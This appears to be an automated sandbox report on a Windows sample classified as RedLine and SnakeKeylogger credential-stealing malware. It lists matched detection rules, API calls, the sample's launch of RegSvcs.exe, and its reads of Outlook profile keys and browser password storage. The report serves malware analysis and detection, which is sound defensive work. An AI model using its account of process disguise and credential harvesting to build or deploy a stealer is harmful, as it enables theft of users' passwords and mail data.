Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.RegSvcs.exe.55b0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.55b0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.55b0000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2eca89e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2eca89e.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2eca89e.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2ec99b6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2ec99b6.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2ec99b6.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2eca89e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2eca89e.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2eca89e.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.3080000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.3080000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.3080000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.3080ee8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.3080ee8.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.3080ee8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.3080ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.3080ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.3080ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.3080000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.3080000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.3080000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.55b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.55b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.55b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2ec99b6.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2ec99b6.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2ec99b6.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.2054161886.0000000000340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.4511931022.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: RegSvcs.exe PID: 4148, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@4/4

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_0040A06A GetLastError,FormatMessageW,

0_2_0040A06A

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003F81CB AdjustTokenPrivileges,CloseHandle,		0_2_003F81CB
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003F87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_003F87E1

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_0040B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0040B333

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_0041EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0041EE0D

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_0040C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0040C397

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003A4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_003A4E89

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

File created: C:\Users\user\AppData\Local\Temp\autD95C.tmp

Jump to behavior

Source: n0nsAzvYNd.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000002.00000002.4513561000.0000000003425000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003407000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000344A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003457000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003417000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: n0nsAzvYNd.exe	Virustotal: Detection: 67%
Source: n0nsAzvYNd.exe	ReversingLabs: Detection: 76%

Source: unknown	Process created: C:\Users\user\Desktop\n0nsAzvYNd.exe "C:\Users\user\Desktop\n0nsAzvYNd.exe"
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\n0nsAzvYNd.exe"
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\n0nsAzvYNd.exe"	Jump to behavior

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: n0nsAzvYNd.exe

Static file information: File size 1163264 > 1048576

Source: n0nsAzvYNd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: n0nsAzvYNd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: n0nsAzvYNd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: n0nsAzvYNd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: n0nsAzvYNd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: n0nsAzvYNd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: n0nsAzvYNd.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: n0nsAzvYNd.exe, 00000000.00000003.2050473496.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, n0nsAzvYNd.exe, 00000000.00000003.2052416082.0000000003410000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: n0nsAzvYNd.exe, 00000000.00000003.2050473496.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, n0nsAzvYNd.exe, 00000000.00000003.2052416082.0000000003410000.00000004.00001000.00020000.00000000.sdmp

Source: n0nsAzvYNd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: n0nsAzvYNd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: n0nsAzvYNd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: n0nsAzvYNd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: n0nsAzvYNd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003A4B37 LoadLibraryA,GetProcAddress,

0_2_003A4B37

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003AC508 push A3003ABAh; retn 003Ah	0_2_003AC50D
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003C8945 push ecx; ret	0_2_003C8958
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041C40C push cs; iretd	2_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00423149 push eax; ret	2_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041C50E push cs; iretd	2_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004231C8 push eax; ret	2_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00423604 push 0000001Bh; ret	2_2_0042396C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040E21D push ecx; ret	2_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041C6BE push ebx; ret	2_2_0041C6BF

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003A48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_003A48D7
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_00425376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00425376

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003C3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_003C3187

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
